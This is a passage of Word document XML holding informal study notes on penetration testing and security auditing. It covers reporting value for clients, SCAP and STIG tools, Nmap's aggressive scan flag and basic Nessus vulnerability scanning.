        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Helped organizations protect themselves against various cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF7F07" w14:textId="20274C18" w:rsidR="00715083" w:rsidRDefault="00715083" w:rsidP="00715083">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Designed to protect MSFT Windows-based internet-connected networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369EFEFB" w14:textId="7EBA8F4B" w:rsidR="00715083" w:rsidRDefault="00715083" w:rsidP="00715083">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4 maturity levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766CF77" w14:textId="5CA3693C" w:rsidR="00A64414" w:rsidRDefault="00A64414" w:rsidP="00715083">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Application Control, Patch Applications, Configure MSFT Office Macros, User App Hardening, Restrict Admin Privs, Patch OS, MFA, Daily Backups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49025641" w14:textId="77777777" w:rsidR="00006CBE" w:rsidRDefault="00006CBE" w:rsidP="00006CBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E925281" w14:textId="14403733" w:rsidR="00006CBE" w:rsidRDefault="00006CBE" w:rsidP="00006CBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Pen-Tests will ALWAYS lead back to the customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F2129" w14:textId="01239075" w:rsidR="00006CBE" w:rsidRDefault="00006CBE" w:rsidP="00006CBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>You need to add value for them, and they need something they can implement to their regular work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF83A8" w14:textId="5B65FF7C" w:rsidR="00D9408A" w:rsidRPr="00006CBE" w:rsidRDefault="00D9408A" w:rsidP="00006CBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tier recommended issues, utilize languages they are familiar with, this will ALL help add value to your report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C93B5" w14:textId="1C0F0CBD" w:rsidR="00DD2C90" w:rsidRDefault="005F3267" w:rsidP="005F3267">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Compliance or Due Diligence?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B28254C" w14:textId="2FD49DD7" w:rsidR="00EF010D" w:rsidRDefault="00EF010D" w:rsidP="00EF010D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Following regulations or just trying to better the environment?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54674227" w14:textId="47DD384C" w:rsidR="00EF010D" w:rsidRDefault="00EF010D" w:rsidP="00EF010D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEAC26B" w14:textId="42CD1BFE" w:rsidR="00EF010D" w:rsidRDefault="00EF010D" w:rsidP="00EF010D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What Helps for Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB0E66" w14:textId="37FC6C77" w:rsidR="00EF010D" w:rsidRDefault="00EF010D" w:rsidP="00EF010D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Interviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD0B5FD" w14:textId="0DD38761" w:rsidR="00614602" w:rsidRDefault="00614602" w:rsidP="00614602">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Understand the whole scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A5B17E" w14:textId="6223172D" w:rsidR="00EF010D" w:rsidRDefault="00614602" w:rsidP="00EF010D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE86FCE" w14:textId="64BBBFA1" w:rsidR="00614602" w:rsidRDefault="00614602" w:rsidP="00614602">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6BB8E8" w14:textId="785FE644" w:rsidR="00614602" w:rsidRDefault="00614602" w:rsidP="00614602">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SolarWinds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C3DFB" w14:textId="7B077458" w:rsidR="001919AA" w:rsidRDefault="001919AA" w:rsidP="001919AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Pen-Tester – Take Good Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929F0B3" w14:textId="57E16345" w:rsidR="001919AA" w:rsidRDefault="00B07743" w:rsidP="001919AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Mind Map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2F1C0" w14:textId="2DC655D5" w:rsidR="00B07743" w:rsidRDefault="00B07743" w:rsidP="00B07743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Map things out, put useful information together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B44C040" w14:textId="2B174FD4" w:rsidR="00B07743" w:rsidRDefault="00B07743" w:rsidP="00B07743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F47359" w14:textId="0C31FF0F" w:rsidR="00B07743" w:rsidRDefault="00B07743" w:rsidP="00B07743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>You’re getting paid on the report, not the Pen-test</w:t>
      </w:r>
      <w:r w:rsidR="005D485C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E267099" w14:textId="676CFB7B" w:rsidR="005D485C" w:rsidRDefault="005D485C" w:rsidP="00B07743">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What comes from the report is the actual Pen-test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36470CAC" w14:textId="77777777" w:rsidR="00DE4AB4" w:rsidRDefault="00DE4AB4" w:rsidP="00DE4AB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A2DDF3" w14:textId="375456B6" w:rsidR="00DE4AB4" w:rsidRDefault="00DE4AB4" w:rsidP="00DE4AB4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SCAP Scan &amp; Stig</w:t>
      </w:r>
      <w:r w:rsidR="00923097">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>iewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57371BCE" w14:textId="0A71AD01" w:rsidR="00F3501F" w:rsidRDefault="00F3501F" w:rsidP="00F3501F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security Content Automation Protocol (SCAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527EA406" w14:textId="29E479E9" w:rsidR="000D1AB3" w:rsidRDefault="000D1AB3" w:rsidP="000D1AB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SCAP Compliance Checker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72056A" w14:textId="14CB2DFF" w:rsidR="000D1AB3" w:rsidRDefault="000D3257" w:rsidP="000D1AB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>STIG Viewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77A33A" w14:textId="03EF2DC8" w:rsidR="00F3501F" w:rsidRPr="00F3501F" w:rsidRDefault="00F3501F" w:rsidP="00F3501F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security Technical Implementation Guides (STIGs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69052A29" w14:textId="77777777" w:rsidR="00DD6603" w:rsidRDefault="00DD6603" w:rsidP="00DD2C90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDFE129" w14:textId="2222AB5F" w:rsidR="009C434B" w:rsidRDefault="009C434B" w:rsidP="00DD2C90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C0D9F8" w14:textId="2F44B872" w:rsidR="009C434B" w:rsidRDefault="00D1200F" w:rsidP="009C434B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-A” flag is very help</w:t>
      </w:r>
      <w:r w:rsidR="00BB6006">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ful to run an aggressive scan to further your auditing capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67754837" w14:textId="4CD09C81" w:rsidR="001A3ED6" w:rsidRDefault="001A3ED6" w:rsidP="009C434B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate what you can, understand the assets that are linked to different machines and </w:t>
      </w:r>
      <w:r w:rsidR="007750F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>potentially recommend patching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7183B581" w14:textId="5777484A" w:rsidR="007750F9" w:rsidRPr="009C434B" w:rsidRDefault="007750F9" w:rsidP="007750F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What version has a vulnerability? Is the current version of this application vulnerable to a certain exploit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE77258" w14:textId="0D9CBB63" w:rsidR="001714AB" w:rsidRDefault="001714AB" w:rsidP="00DD2C90">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09212E" w14:textId="42164DF8" w:rsidR="00FD709E" w:rsidRDefault="00FD709E" w:rsidP="00F924C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Nessus Essentials has a web login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B2172F" w14:textId="44482566" w:rsidR="006B0C9A" w:rsidRDefault="008D03C4" w:rsidP="00FD709E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Pretty easy, enter in the host info and run yo </w:t>
      </w:r>
      <w:r w:rsidR="00E032DA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>shit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21040627" w14:textId="1A340A59" w:rsidR="008D03C4" w:rsidRDefault="00E032DA" w:rsidP="00E032DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">These scans are generally </w:t>
      </w:r>
      <w:r w:rsidR="00606260">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>long;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00606260">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>however,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can run a lot of scans that can mimic what NMAP does</w:t>
      </w:r>
      <w:r w:rsidR="00606260">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F52523" w14:textId="19E4D384" w:rsidR="00606260" w:rsidRDefault="00606260" w:rsidP="00E032DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>It has a couple assets that may help,</w:t>
      </w:r>
      <w:r w:rsidR="0047506D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> use service </w:t>
      </w:r>
      <w:r w:rsidR="00A15141">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>enumeration techniques it provides,</w:t>
      </w:r>
      <w:r w:rsidR="0047506D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and essentially try to find any holes possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F0B787" w14:textId="1AC9A080" w:rsidR="00A15141" w:rsidRDefault="00A15141" w:rsidP="00E032DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Severity separation, these come with the Nessus scan output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7581D921" w14:textId="77D73582" w:rsidR="00E33768" w:rsidRDefault="00E33768" w:rsidP="00E33768">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Advanced Scans, go a little in-depth with your scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE99560" w14:textId="4A9EDFE3" w:rsidR="00CD5D62" w:rsidRDefault="00CD5D62" w:rsidP="00E33768">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also </w:t>
      </w:r>
      <w:r w:rsidR="00795064">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>investigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the vulnerabilities a lot more and look at the different references it provides to help in the report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345BE906" w14:textId="76C33B78" w:rsidR="00795064" w:rsidRDefault="00795064" w:rsidP="00E33768">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could potentially generate your own report</w:t>
      </w:r>
      <w:r w:rsidR="001270EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> within Nessus.</w:t>
      </w:r>
    </w:p>
